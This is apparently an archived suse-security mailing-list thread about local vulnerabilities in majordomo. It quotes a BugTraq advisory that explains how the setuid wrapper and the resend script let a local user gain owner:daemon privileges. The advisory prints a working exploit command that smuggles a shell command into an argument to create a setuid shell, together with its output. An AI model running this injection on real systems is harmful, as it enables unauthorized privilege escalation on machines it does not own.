[Fwd: [suse-security] majordomo vulnerability]
Hi Marc, can you say (or point to an URL), what these vulnerabilities are? Getting root-rights as a normal user? Or just abusing majordomo, getting around moderation etc.? Thanks Torsten Marc Heuse wrote:
Hi,
the mailinglist software "majordomo" was found having several local vulnerabilties. However, the licence of the program prohibites us providing a fix! :-( You should either remove majordomo or trust your local users until an official fix from greatcircles is available (which we will distribute for SuSE customers too then of course). Sorry guys, thats all we can do at the moment.
Hi Torsten,
can you say (or point to an URL), what these vulnerabilities are? Getting root-rights as a normal user? Or just abusing majordomo, getting around moderation etc.?
Have a look at: http://www.securityfocus.com/templates/archive.pike?list=1&date=1999-12-29&t... OVERVIEW from BugTraq: ------------------------- [Brock Tellier (initialy reported):] OVERVIEW A vulnerability in majordomo allows local users to gain elevated privileges. DETAILS The majordomo wrapper allows users to run programs in the /usr/local/majordomo directory with the uid of owner and the gid of daemon. The permissions for wrapper are: -rwsr-xr-x 1 root daemon 6464 Jan 4 1999 /usr/local/majordomo/wrapper but wrapper immediatly setuid()'s and setgid()'s to owner:daemon before execing the wrapped program. A vulnerability in "/usr/local/majordomo/resend" will allow us to execute arbitrary commands with our elevated privileges. The following code snippet appears in resend, a perl script: -snip- [...] EXPLOIT Our exploit is simple: bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec' resend: must specify '-l list' at /usr/local/majordomo/resend line 77. bash-2.02$ ls -la /tmp/xnec -r-sr-sr-x 1 owner daemon 361688 Dec 29 06:26 /tmp/xnec ------------------------------------------
participants (2)
-
Tobias Burnus -
Torsten Behle